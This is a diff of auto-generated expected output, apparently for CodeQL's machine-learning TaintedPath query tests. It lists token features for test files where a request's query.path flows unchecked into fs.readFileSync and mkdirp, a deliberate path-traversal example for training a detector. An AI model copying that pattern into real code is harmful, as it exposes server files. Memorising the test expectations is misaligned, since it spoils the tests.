res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:7:68:48 | path = ... ry.path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:16 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:16 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:16 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:22 | url.parse | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:22 | url.parse | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | exceptional return of url.par ... , true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | url.par ... , true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:37 | url.par ... , true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:43 | url.par ... ).query | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:43 | url.par ... ).query | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:18:68:22 | parse | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:18:68:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:18:68:22 | parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:18:68:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:18:68:22 | parse | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:26 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:26 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:26 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:30 | req.url | calleeImports | url | @@ -10246,6 +81962,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:30 | req.url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:68:24:68:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/other-fs-libraries.js:68:28:68:30 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:28:68:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:28:68:30 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:28:68:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:28:68:30 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:68:33:68:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/other-fs-libraries.js:68:33:68:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/other-fs-libraries.js:68:33:68:36 | true | calleeImports | url | @@ -10255,6 +81976,41 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:68:33:68:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:68:33:68:36 | true | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:68:33:68:36 | true | receiverName | url | +| autogenerated/TaintedPath/other-fs-libraries.js:68:39:68:43 | query | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:39:68:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:39:68:43 | query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:39:68:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:39:68:43 | query | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:68:45:68:48 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:45:68:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:68:45:68:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:68:45:68:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:68:45:68:48 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:4 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:4 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:17 | fs.readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:17 | fs.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | exceptional return of fs.read ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | fs.read ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:70:3:70:23 | fs.read ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:70:6:70:17 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:6:70:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:70:6:70:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:70:6:70:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:70:6:70:17 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:70:19:70:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:70:19:70:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:70:19:70:22 | path | calleeImports | fs | @@ -10264,6 +82020,21 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:70:19:70:22 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:70:19:70:22 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:70:19:70:22 | path | receiverName | fs | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:8 | mkdirp | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:8 | mkdirp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:8 | mkdirp | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:8 | mkdirp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:8 | mkdirp | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | exceptional return of mkdirp(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | exceptional return of mkdirp(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | exceptional return of mkdirp(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | exceptional return of mkdirp(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | exceptional return of mkdirp(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | mkdirp(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | mkdirp(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | mkdirp(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | mkdirp(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:71:3:71:14 | mkdirp(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:71:10:71:13 | path | CalleeFlexibleAccessPath | mkdirp | | autogenerated/TaintedPath/other-fs-libraries.js:71:10:71:13 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:71:10:71:13 | path | calleeImports | mkdirp | @@ -10272,6 +82043,31 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:71:10:71:13 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | | autogenerated/TaintedPath/other-fs-libraries.js:71:10:71:13 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:71:10:71:13 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:8 | mkdirp | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:8 | mkdirp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:8 | mkdirp | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:8 | mkdirp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:8 | mkdirp | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:13 | mkdirp.sync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:13 | mkdirp.sync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:13 | mkdirp.sync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:13 | mkdirp.sync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:13 | mkdirp.sync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | exceptional return of mkdirp.sync(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | exceptional return of mkdirp.sync(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | exceptional return of mkdirp.sync(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | exceptional return of mkdirp.sync(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | exceptional return of mkdirp.sync(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | mkdirp.sync(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | mkdirp.sync(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | mkdirp.sync(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | mkdirp.sync(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:72:3:72:19 | mkdirp.sync(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:72:10:72:13 | sync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:10:72:13 | sync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:72:10:72:13 | sync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path mkdirp path mkdirp sync path | +| autogenerated/TaintedPath/other-fs-libraries.js:72:10:72:13 | sync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:72:10:72:13 | sync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:72:15:72:18 | path | CalleeFlexibleAccessPath | mkdirp.sync | | autogenerated/TaintedPath/other-fs-libraries.js:72:15:72:18 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:72:15:72:18 | path | calleeImports | mkdirp | @@ -10281,18 +82077,97 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:72:15:72:18 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:72:15:72:18 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:72:15:72:18 | path | receiverName | mkdirp | +| autogenerated/TaintedPath/prettier.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:1:1:0 | this | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:1:1:1:1 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:1:1:1 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:1:1:1 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:1:1:1 | require | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:1:7:1:13 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:7:1:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:7:1:13 | express | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:1:7:1:34 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:7:1:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:7:1:34 | express | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:1:7:1:34 | express ... press') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:7:1:34 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:7:1:34 | express ... press') | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:1:17:1:23 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:17:1:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:17:1:23 | require | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:1:17:1:34 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:17:1:34 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:17:1:34 | exceptional return of require('express') | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:1:17:1:34 | require('express') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:1:17:1:34 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:1:17:1:34 | require('express') | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:1:25:1:33 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/prettier.js:1:25:1:33 | 'express' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:1:25:1:33 | 'express' | calleeImports | | | autogenerated/TaintedPath/prettier.js:1:25:1:33 | 'express' | contextFunctionInterfaces | | | autogenerated/TaintedPath/prettier.js:1:25:1:33 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/prettier.js:1:25:1:33 | 'express' | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:2:7:2:14 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:2:7:2:14 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:2:7:2:14 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:2:7:2:14 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:2:7:2:36 | prettie ... ttier") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:2:7:2:36 | prettie ... ttier") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:2:7:2:36 | prettie ... ttier") | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:2:7:2:36 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:2:7:2:36 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:2:7:2:36 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:2:18:2:24 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:2:18:2:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:2:18:2:24 | require | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:2:18:2:36 | exceptional return of require("prettier") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:2:18:2:36 | exceptional return of require("prettier") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:2:18:2:36 | exceptional return of require("prettier") | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:2:18:2:36 | require("prettier") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:2:18:2:36 | require("prettier") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:2:18:2:36 | require("prettier") | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:2:26:2:35 | "prettier" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/prettier.js:2:26:2:35 | "prettier" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:2:26:2:35 | "prettier" | calleeImports | | | autogenerated/TaintedPath/prettier.js:2:26:2:35 | "prettier" | contextFunctionInterfaces | | | autogenerated/TaintedPath/prettier.js:2:26:2:35 | "prettier" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/prettier.js:2:26:2:35 | "prettier" | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:4:7:4:9 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:4:7:4:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:4:7:4:9 | app | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:4:7:4:21 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:4:7:4:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:4:7:4:21 | app | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:4:7:4:21 | app = express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:4:7:4:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:4:7:4:21 | app = express() | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:4:13:4:19 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:4:13:4:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:4:13:4:19 | express | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:4:13:4:21 | exceptional return of express() | contextFunctionInterfaces | | +| 